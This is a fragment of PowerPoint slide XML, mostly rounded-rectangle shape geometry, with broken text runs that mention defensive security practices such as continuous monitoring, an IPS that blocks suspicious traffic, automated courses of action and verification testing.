          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4282440" h="2056129">
                <a:moveTo>
                  <a:pt x="0" y="342646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3128" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939793" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3986287" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030880" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073163" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4112730" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149171" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182078" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211042" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235656" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255512" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270199" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279311" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282440" y="342646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282440" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279311" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270199" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255512" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235656" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211042" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182078" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149171" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4112730" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073163" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030880" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3986287" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939793" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3128" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="342646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="39405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13305" y="5974994"/>
            <a:ext cx="3728720" cy="7912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14199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Us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locally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stalle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agent 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3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heartbeat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protocol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68067" y="4430267"/>
            <a:ext cx="3313429" cy="1191895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3313429" h="1191895">
                <a:moveTo>
                  <a:pt x="3114547" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="198627" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="993140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198627" y="1191768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114547" y="1191768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="993140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="198628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114547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911855" y="4591963"/>
            <a:ext cx="1624965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5080" indent="-26034">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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2200" spc="-10" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ous  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Monitoring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64758" y="5385053"/>
            <a:ext cx="4282440" cy="2049780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4282440" h="2049779">
                <a:moveTo>
                  <a:pt x="0" y="341630"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3117" y="295263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12200" y="250795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26840" y="208633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46632" y="169182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71169" y="132850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100044" y="100044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132850" y="71169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169182" y="46632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208633" y="26840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250795" y="12200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295263" y="3117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341629" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3940810" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3987176" y="3117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4031644" y="12200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073806" y="26840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4113257" y="46632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149589" y="71169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182395" y="100044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211270" y="132850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235807" y="169182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255599" y="208633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270239" y="250795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279322" y="295263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282440" y="341630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282440" y="1708150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279322" y="1754516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270239" y="1798984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255599" y="1841146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235807" y="1880597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211270" y="1916929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182395" y="1949735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149589" y="1978610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4113257" y="2003147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073806" y="2022939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4031644" y="2037579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3987176" y="2046662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3940810" y="2049780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341629" y="2049780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295263" y="2046662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250795" y="2037579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208633" y="2022939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169182" y="2003147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132850" y="1978610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100044" y="1949735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71169" y="1916929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46632" y="1880597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26840" y="1841146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12200" y="1798984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3117" y="1754516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1708150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341630"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="39405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293865" y="5784343"/>
            <a:ext cx="3717290" cy="11734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marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="9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Configure 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an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IPS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to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automatical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b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ock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affic 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tha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deems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sp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cious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48628" y="4430267"/>
            <a:ext cx="3313429" cy="1191895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3313429" h="1191895">
                <a:moveTo>
                  <a:pt x="3114548" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="198627" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="993140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198627" y="1191768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114548" y="1191768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="993140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="198628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114548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818121" y="4591963"/>
            <a:ext cx="2773680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62635" marR="5080" indent="-750570">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Courses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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6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22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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Action</a:t>
            </a:r>
            <a:endParaRPr sz="2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545318" y="5377434"/>
            <a:ext cx="4282440" cy="2056130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4282440" h="2056129">
                <a:moveTo>
                  <a:pt x="0" y="342645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3128" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939793" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3986287" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030880" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073163" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4112730" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149171" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182078" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211042" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235656" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255512" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270199" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279311" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282439" y="342645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4282439" y="1713229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4279311" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4270199" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4255512" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235656" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4211042" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4182078" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149171" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4112730" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073163" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030880" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3986287" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939793" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3128" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1713229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="342645"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="39405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0775060" y="5971438"/>
            <a:ext cx="3729990" cy="1173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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Tes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qu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ments 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mode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7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pro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cesse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of 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verification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validation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1024425" y="4428553"/>
            <a:ext cx="3322954" cy="1201420"/>
            <a:chOff x="11024425" y="4428553"/>
            <a:chExt cx="3322954" cy="1201420"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11029188" y="4433315"/>
              <a:ext cx="3313429" cy="1191895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3313430" h="1191895">
                  <a:moveTo>
                    <a:pt x="3114548" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="198628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="1191768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114548" y="1191768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160100" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201912" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238791" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269548" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292992" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307931" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313175" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313175" y="198628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307931" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292992" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269548" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238791" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201912" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160100" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114548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1029188" y="4433315"/>
              <a:ext cx="3313429" cy="1191895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3313430" h="1191895">
                  <a:moveTo>
                    <a:pt x="0" y="198628"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5244" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114548" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160100" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201912" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238791" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269548" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292992" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307931" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313175" y="198628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313175" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307931" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3292992" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269548" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238791" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3201912" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160100" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114548" y="1191768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="1191768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
